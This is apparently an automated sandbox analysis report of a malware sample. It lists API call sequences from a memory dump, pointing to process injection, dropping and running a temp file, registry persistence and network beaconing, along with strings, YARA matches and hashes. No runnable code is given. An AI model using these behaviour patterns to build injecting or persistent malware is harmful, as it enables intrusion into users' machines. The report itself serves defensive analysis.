                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F985B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2981417381-2746444292
                                                                                        • Opcode ID: b91a2ef0b3e19d6b3582bde094d2274072d8592724424d6f77fcbed54c311dd6
                                                                                        • Instruction ID: ea0f4cb7d4b86629cf821dc50d060b9a37b2566ce0ae29a826d07bee3d6cdfec
                                                                                        • Opcode Fuzzy Hash: b91a2ef0b3e19d6b3582bde094d2274072d8592724424d6f77fcbed54c311dd6
                                                                                        • Instruction Fuzzy Hash: 34212AB1D02219AFDB61EFA1DC49FEFBBBCEF0C654F040060BA19E5054EB719644CAA0
                                                                                        APIs
                                                                                          • Part of subcall function 030FDD05: GetTickCount.KERNEL32 ref: 030FDD0F
                                                                                          • Part of subcall function 030FDD05: InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
                                                                                          • Part of subcall function 030FDD05: GetCurrentThreadId.KERNEL32 ref: 030FDD53
                                                                                          • Part of subcall function 030FDD84: lstrcmpiA.KERNEL32(80000011,00000000), ref: 030FDDB5
                                                                                        • lstrcpynA.KERNEL32(?,030F1E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,030FEAAA,?,?), ref: 030FE8DE
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,030FEAAA,?,?,00000001,?,030F1E84,?), ref: 030FE935
                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,?,?,030FEAAA,?,?,00000001,?,030F1E84,?,0000000A), ref: 030FE93D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,030FEAAA,?,?,00000001,?,030F1E84,?), ref: 030FE94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                        • String ID: flags_upd$localcfg
                                                                                        • API String ID: 204374128-3505511081
                                                                                        • Opcode ID: 18e6b441e218d39aa0f551c2d5b179b2f74a7c6f76c5d84939bbdea2de1a4599
                                                                                        • Instruction ID: 8bf9f5558363860dba66119f499d2f1aafecf81ccf5fcb25d7087495ebcbb014
                                                                                        • Opcode Fuzzy Hash: 18e6b441e218d39aa0f551c2d5b179b2f74a7c6f76c5d84939bbdea2de1a4599
                                                                                        • Instruction Fuzzy Hash: F351417690120AEFCF01EFA8C984DEEB7F9FF48208F14456AE605A7610D775EA54CB60
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID:
                                                                                        • API String ID: 3609698214-0
                                                                                        • Opcode ID: 732ba1998bb086e261bce17b6f31edcbbb69e708fd46492c0361d04be18e631d
                                                                                        • Instruction ID: 33d1e349bea4a01371ed34fa7944657e0245604b863644942793916e95795598
                                                                                        • Opcode Fuzzy Hash: 732ba1998bb086e261bce17b6f31edcbbb69e708fd46492c0361d04be18e631d
                                                                                        • Instruction Fuzzy Hash: 9F21D576102209FFDB14EB70EE48EAF7BACDB483A4B104915F742E1448EB72DA40D6B4
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?,00000000,031022F8), ref: 030F907B
                                                                                        • wsprintfA.USER32 ref: 030F90E9
                                                                                        • CreateFileA.KERNEL32(031022F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 030F910E
                                                                                        • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 030F9122
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 030F912D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 030F9134
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2439722600-0
                                                                                        • Opcode ID: 0b655a71f99848aabe6df76a83ee46577068adae8e0771fc5bea657a6504efa1
                                                                                        • Instruction ID: 4975ed5983e458f7aaf140cd0b7af4c10a9c6eaadcd152f19ff680c646d4c087
                                                                                        • Opcode Fuzzy Hash: 0b655a71f99848aabe6df76a83ee46577068adae8e0771fc5bea657a6504efa1
                                                                                        • Instruction Fuzzy Hash: C811B7B66412147FF724B626DD09FEF366DDBCDB04F008065B70AA5094EAB44A4286B0
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030FDD0F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 030FDD20
                                                                                        • GetTickCount.KERNEL32 ref: 030FDD2E
                                                                                        • Sleep.KERNEL32(00000000,?,75920F10,?,00000000,030FE538,?,75920F10,?,00000000,?,030FA445), ref: 030FDD3B
                                                                                        • InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 030FDD53
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3819781495-0
                                                                                        • Opcode ID: fcb57ea9f08debaa6c9a5c3b2f1238a751006d243757512581276fe24ef79872
                                                                                        • Instruction ID: d29219042fcf6d24c623e20543a9d8427c36a1a577ca0b39d4fd23a764feb95a
                                                                                        • Opcode Fuzzy Hash: fcb57ea9f08debaa6c9a5c3b2f1238a751006d243757512581276fe24ef79872
                                                                                        • Instruction Fuzzy Hash: 69F05E76106204DFD7C8FF65AA84B2D7BADEB4D39AF044816E609C264DCBB051C58E72
                                                                                        APIs
                                                                                        • gethostname.WS2_32(?,00000080), ref: 030FAD1C
                                                                                        • lstrlenA.KERNEL32(?), ref: 030FAD60
                                                                                        • lstrlenA.KERNEL32(?), ref: 030FAD69
                                                                                        • lstrcpyA.KERNEL32(?,LocalHost), ref: 030FAD7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$gethostnamelstrcpy
                                                                                        • String ID: LocalHost
                                                                                        • API String ID: 3695455745-3154191806
                                                                                        • Opcode ID: ca413be42b76f035d1199b93a61654ed44f752cc9da184425df01ab9d43cda57
                                                                                        • Instruction ID: 232eea2040386179fc70d4bc44b37a2cf7bc878bc5ae56cf96b77c5c1925aebd
                                                                                        • Opcode Fuzzy Hash: ca413be42b76f035d1199b93a61654ed44f752cc9da184425df01ab9d43cda57
                                                                                        • Instruction Fuzzy Hash: 60016D24A4618D5DDF75D628C444BF87FAE5F8F64AF080095DACA8B515DB6480838F72
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030F98FD,00000001,00000100,031022F8,030FA3C7), ref: 030F4290
                                                                                        • CloseHandle.KERNEL32(030FA3C7), ref: 030F43AB
                                                                                        • CloseHandle.KERNEL32(00000001), ref: 030F43AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateEvent
                                                                                        • String ID:
                                                                                        • API String ID: 1371578007-0
                                                                                        • Opcode ID: cfee8009ee4d5511a8bae71be6b94b5aebfbf68b68b3dbf38b55841149767eb2
                                                                                        • Instruction ID: 11c2206659aa9020251e8b2c0d2a272bc5428de58f71c80ccd25786a45ed455a
                                                                                        • Opcode Fuzzy Hash: cfee8009ee4d5511a8bae71be6b94b5aebfbf68b68b3dbf38b55841149767eb2
                                                                                        • Instruction Fuzzy Hash: 07418CB5901209BEDB10EBA2CD85FEFBBBCEF84364F104555FB14A6580D7748641CBA0
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,030F64CF,00000000), ref: 030F609C
                                                                                        • LoadLibraryA.KERNEL32(?,?,030F64CF,00000000), ref: 030F60C3
                                                                                        • GetProcAddress.KERNEL32(?,00000014), ref: 030F614A
                                                                                        • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 030F619E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2438460464-0
                                                                                        • Opcode ID: 1af15b76a671ed8001150e7926a730cbdf292d750cdd3b920b6fab9523778324
                                                                                        • Instruction ID: b6e8b54c34e2a4147954430d7b89dd2ec3778479c098cc3a3475976cc087c44d
                                                                                        • Opcode Fuzzy Hash: 1af15b76a671ed8001150e7926a730cbdf292d750cdd3b920b6fab9523778324
                                                                                        • Instruction Fuzzy Hash: D2418F71A01209AFDB14EF58C884B6AB7F9FF44354F1C8468EA55D7691D732E940CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 44ea4e701660c04141f41a4df0ecd9896ae83ec4699f33179c6657f50e14f4d6
                                                                                        • Instruction ID: 3bcb7dc9c6e3f3a7a5fd207fbfac74499ada268c0b71303b8977caab1ba27767
                                                                                        • Opcode Fuzzy Hash: 44ea4e701660c04141f41a4df0ecd9896ae83ec4699f33179c6657f50e14f4d6
                                                                                        • Instruction Fuzzy Hash: B3319F79A01308AFCB10DFA5CC81BFEB7F8EF48705F144856E604EB645E274D6418B60
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F272E
                                                                                        • htons.WS2_32(00000001), ref: 030F2752
                                                                                        • htons.WS2_32(0000000F), ref: 030F27D5
                                                                                        • htons.WS2_32(00000001), ref: 030F27E3
                                                                                        • sendto.WS2_32(?,03102BF8,00000009,00000000,00000010,00000010), ref: 030F2802
                                                                                          • Part of subcall function 030FEBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,030FEBFE,7FFF0001,?,030FDB55,7FFF0001), ref: 030FEBD3
                                                                                          • Part of subcall function 030FEBCC: RtlAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                        • String ID:
                                                                                        • API String ID: 1128258776-0
                                                                                        • Opcode ID: 79236b85ceb3108df1819d02dfbca7afe6d1efab76e01ebc7c50631f91f77666
                                                                                        • Instruction ID: b0010c2e29ed58b2c4145ae41a89fe7927ab3aca83ebb793af520c472c50597b
                                                                                        • Opcode Fuzzy Hash: 79236b85ceb3108df1819d02dfbca7afe6d1efab76e01ebc7c50631f91f77666
                                                                                        • Instruction Fuzzy Hash: BD3144382423829FD758EF74D884E6677B8EF5D31CB1988ADD9558B712D2B394C2CB20
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,031022F8), ref: 030F915F
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 030F9166
                                                                                        • CharToOemA.USER32(?,?), ref: 030F9174
                                                                                        • wsprintfA.USER32 ref: 030F91A9
                                                                                          • Part of subcall function 030F9064: GetTempPathA.KERNEL32(00000400,?,00000000,031022F8), ref: 030F907B
                                                                                          • Part of subcall function 030F9064: wsprintfA.USER32 ref: 030F90E9
                                                                                          • Part of subcall function 030F9064: CreateFileA.KERNEL32(031022F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 030F910E
                                                                                          • Part of subcall function 030F9064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 030F9122
                                                                                          • Part of subcall function 030F9064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 030F912D
                                                                                          • Part of subcall function 030F9064: CloseHandle.KERNEL32(00000000), ref: 030F9134
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 030F91E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3857584221-0
                                                                                        • Opcode ID: 101fce587a8fe633dcf44386605b725e9d6318bc4ec02a4661b55cadc4f7106f
                                                                                        • Instruction ID: 7c944463cba17cb92e70b0581d2b5ee493f69c3218012fef4daf2bf704fa69f4
                                                                                        • Opcode Fuzzy Hash: 101fce587a8fe633dcf44386605b725e9d6318bc4ec02a4661b55cadc4f7106f
                                                                                        • Instruction Fuzzy Hash: 05012DB69002587BD660B661DD49FDF767C9B8DB05F0000A1B749E6084DAB496C58F71
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,030F2491,?,?,?,030FE844,-00000030,?,?,?,00000001), ref: 030F2429
                                                                                        • lstrlenA.KERNEL32(?,?,030F2491,?,?,?,030FE844,-00000030,?,?,?,00000001,030F1E3D,00000001,localcfg,lid_file_upd), ref: 030F243E
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 030F2452
                                                                                        • lstrlenA.KERNEL32(?,?,030F2491,?,?,?,030FE844,-00000030,?,?,?,00000001,030F1E3D,00000001,localcfg,lid_file_upd), ref: 030F2467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1808961391-1857712256
                                                                                        • Opcode ID: f4d140e5bb0f57154e9c6784038208dd3443c832d4957010a54636f0663aadcf
                                                                                        • Instruction ID: 2e59eb7f6f9a9534cd243cb68ff82ee7187c5757876869dfa19d933c649a3269
                                                                                        • Opcode Fuzzy Hash: f4d140e5bb0f57154e9c6784038208dd3443c832d4957010a54636f0663aadcf
                                                                                        • Instruction Fuzzy Hash: 62011A35601618AFCF11EF69CC808DEBBADEF45394B05C825E95997A00E3B0EA408A90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                        • API String ID: 2111968516-120809033
                                                                                        • Opcode ID: 9126ad6ef7c08ad71aa105feb62d5517414366ecb08633fa43ea183f727e1a8b
                                                                                        • Instruction ID: 3192a4a294e56dc77febc311df09c9bbc3a32fdff2fd2a0763f1c40efb587544
                                                                                        • Opcode Fuzzy Hash: 9126ad6ef7c08ad71aa105feb62d5517414366ecb08633fa43ea183f727e1a8b
                                                                                        • Instruction Fuzzy Hash: 13419A769052989FDB25DFB88C44BEE7BFCAF4D210F280056FAA4D7152D634DA04CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 030FDD05: GetTickCount.KERNEL32 ref: 030FDD0F
                                                                                          • Part of subcall function 030FDD05: InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
                                                                                          • Part of subcall function 030FDD05: GetCurrentThreadId.KERNEL32 ref: 030FDD53
                                                                                        • lstrcmpA.KERNEL32(75920F18,00000000,?,75920F10,00000000,?,030F5EC1), ref: 030FE693
                                                                                        • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,75920F10,00000000,?,030F5EC1), ref: 030FE6E9
                                                                                        • lstrcmpA.KERNEL32(89ABCDEF,00000008,?,75920F10,00000000,?,030F5EC1), ref: 030FE722
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                        • String ID: 89ABCDEF
                                                                                        • API String ID: 3343386518-71641322
                                                                                        • Opcode ID: 1330356a4b7a35f7f18c530a445690df8f999971abdb621cb06ea7550addfd9c
                                                                                        • Instruction ID: f609286d2b07b053a615694453554235b21b62b98e84f8e5af4c889292d14fd4
                                                                                        • Opcode Fuzzy Hash: 1330356a4b7a35f7f18c530a445690df8f999971abdb621cb06ea7550addfd9c
                                                                                        • Instruction Fuzzy Hash: 2A31E431602709DFCF35CF24D88875B77E8AF08754F18486AE6458B9A4E7B0E880CB51
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,030FE2A3,00000000,00000000,00000000,00020106,00000000,030FE2A3,00000000,000000E4), ref: 030FE0B2
                                                                                        • RegSetValueExA.ADVAPI32(030FE2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,031022F8), ref: 030FE127
                                                                                        • RegDeleteValueA.ADVAPI32(030FE2A3,?,?,?,?,?,000000C8,031022F8), ref: 030FE158
                                                                                        • RegCloseKey.ADVAPI32(030FE2A3,?,?,?,?,000000C8,031022F8,?,?,?,?,?,?,?,?,030FE2A3), ref: 030FE161
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseCreateDelete
                                                                                        • String ID:
                                                                                        • API String ID: 2667537340-0
                                                                                        • Opcode ID: 820e9afd4342fe534fa4adfa93e359aa9a9609dbdbcf6660a9c31a011f60ab10
                                                                                        • Instruction ID: 4e8425ab0fd585e4451ce87a1a93b9c317957bf0db24f9e5f2c233b1a18141d5
                                                                                        • Opcode Fuzzy Hash: 820e9afd4342fe534fa4adfa93e359aa9a9609dbdbcf6660a9c31a011f60ab10
                                                                                        • Instruction Fuzzy Hash: 89216471A0121DBFDF20EEA9DC89EDE7FB9EF09754F044061FA04E6164E6718A54C7A0
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,030FA3C7,00000000,00000000,000007D0,00000001), ref: 030F3F44
                                                                                        • GetLastError.KERNEL32 ref: 030F3F4E
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 030F3F5F
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 030F3F72
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 26e44ef13c0799d76d495db90164b055210f7b078270fd8f6ac5b979f7ee57d4
                                                                                        • Instruction ID: 1a744ceb30c0eb8503b78fb0515859860fa68e6b9dbac55c88712de95f16b8e7
                                                                                        • Opcode Fuzzy Hash: 26e44ef13c0799d76d495db90164b055210f7b078270fd8f6ac5b979f7ee57d4
                                                                                        • Instruction Fuzzy Hash: A901A572515209AFDF15EF90DD84BEF7BBCEB082A5F1044A5FA01E2044D770DA558BB2
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,030FA3C7,00000000,00000000,000007D0,00000001), ref: 030F3FB8
                                                                                        • GetLastError.KERNEL32 ref: 030F3FC2
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 030F3FD3
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 030F3FE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 800981ccccb39b6e6bc8b79a423ea8d1416c69a56def0e2fc515882093a72efe
                                                                                        • Instruction ID: 7c808d2567351eee9fcf2fc1490b504a973000a62c9faac9551191d4ee6b2b08
                                                                                        • Opcode Fuzzy Hash: 800981ccccb39b6e6bc8b79a423ea8d1416c69a56def0e2fc515882093a72efe
                                                                                        • Instruction Fuzzy Hash: 5401A97251120AAFDF11EFA4D945BEE7BBCEB08265F104591FA02E2054D770DA548BB1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F4BDD
                                                                                        • GetTickCount.KERNEL32 ref: 030F4BEC
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,0341B114,030F50F2), ref: 030F4BF9
                                                                                        • InterlockedExchange.KERNEL32(0341B108,00000001), ref: 030F4C02
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 91af060c687b1c723926bc72ee08b8dd675411af5a59132fd095f7bed600200d
                                                                                        • Instruction ID: fc22f5855fc3b7a2cbf66feb4f95024ca985802dceeb0ebf93ce651ef55de0e3
                                                                                        • Opcode Fuzzy Hash: 91af060c687b1c723926bc72ee08b8dd675411af5a59132fd095f7bed600200d
                                                                                        • Instruction Fuzzy Hash: 0DE0CD332422145BD71076FB5D84F9B779CDB4D3B6F060572FF08D2549D5D6948141B1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F4E9E
                                                                                        • GetTickCount.KERNEL32 ref: 030F4EAD
                                                                                        • Sleep.KERNEL32(0000000A,?,00000001), ref: 030F4EBA
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 030F4EC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 77edf05be7702111e74a06715dbafb1ece205cc158daaf9a7474d6c7ede77af0
                                                                                        • Instruction ID: 1469fbe465f961628d601e6a8de03cb868f94e12aa7d26360e03fdd3cc2b29a4
                                                                                        • Opcode Fuzzy Hash: 77edf05be7702111e74a06715dbafb1ece205cc158daaf9a7474d6c7ede77af0
                                                                                        • Instruction Fuzzy Hash: 5BE086322022145BD71076BAAD84F5B768D9B4E2A9F050571EB09D2148C696948245B1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030FA4D1
                                                                                        • GetTickCount.KERNEL32 ref: 030FA4E4
                                                                                        • Sleep.KERNEL32(00000000,?,030FC2E9,030FC4E0,00000000,localcfg,?,030FC4E0,03103588,030F8810), ref: 030FA4F1
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 030FA4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 9103f594589096b1578dd348926ac6239db61159c3a6347d2df0d32941a32d62
                                                                                        • Instruction ID: 764020580a6d88ab59d5701c72df8870de303455a123f76c4f31c0e7de7abb7c
                                                                                        • Opcode Fuzzy Hash: 9103f594589096b1578dd348926ac6239db61159c3a6347d2df0d32941a32d62
                                                                                        • Instruction Fuzzy Hash: 6AE026333022055FC600ABA5AD84F6A3398AB8D6A1F050061FB08D3548C696A48149B6
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F3103
                                                                                        • GetTickCount.KERNEL32 ref: 030F310F
                                                                                        • Sleep.KERNEL32(00000000), ref: 030F311C
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 030F3128
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: aae22e717a039c82888ef879685f3cca7c6b385c7d9af91e744668f14a024054
                                                                                        • Instruction ID: 38d784167d0b1be355f37a50d79986a7215d481484ed6be4a1192831b667a759
                                                                                        • Opcode Fuzzy Hash: aae22e717a039c82888ef879685f3cca7c6b385c7d9af91e744668f14a024054
                                                                                        • Instruction Fuzzy Hash: E5E0C239201215AFDB00BB79AE44B4A6A9EEF8C7B5F0104B5F301D2598C69088808971
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 536389180-1857712256
                                                                                        • Opcode ID: 2d8ed16fcd44915d8f9224a1a0be733b5163984e5a3ad19b5e89b428712a7df4
                                                                                        • Instruction ID: f44adc0f2dcf60bd2f10e75e0b7b3d4aac4bc391b5cb7aea298d23a79da25134
                                                                                        • Opcode Fuzzy Hash: 2d8ed16fcd44915d8f9224a1a0be733b5163984e5a3ad19b5e89b428712a7df4
                                                                                        • Instruction Fuzzy Hash: DB21D233612211AFCB58EF78C8D06DEBBF9EF20254B2D8459D501DB902CB74E980CB60
                                                                                        APIs
                                                                                        Strings
                                                                                        • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 030FC057
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickwsprintf
                                                                                        • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                        • API String ID: 2424974917-1012700906
                                                                                        • Opcode ID: e8d447b9ef3cd933a861cac0f053cd57223ce89b33e4f393d6cacbdacc9b0732
                                                                                        • Instruction ID: 463e3d2468d2f78b2d66d42bc52278145e3ef03271c342279701c96c764ab768
                                                                                        • Opcode Fuzzy Hash: e8d447b9ef3cd933a861cac0f053cd57223ce89b33e4f393d6cacbdacc9b0732
                                                                                        • Instruction Fuzzy Hash: FD119772100100FFDB429AA9CD44E567FA6FF8C319B34819CF6188E166D633D863EB50
                                                                                        APIs
                                                                                        • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 030F26C3
                                                                                        • inet_ntoa.WS2_32(?), ref: 030F26E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbyaddrinet_ntoa
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2112563974-1857712256
                                                                                        • Opcode ID: 79ecbaf052e9b2c88cb13aa9c54e7364a05a5ba50ae76f505a8251e31037f826
                                                                                        • Instruction ID: ae8e1802fb081d16351e6e17bb64e7a9dee58054154100c18c8ebf62616fbfe7
                                                                                        • Opcode Fuzzy Hash: 79ecbaf052e9b2c88cb13aa9c54e7364a05a5ba50ae76f505a8251e31037f826
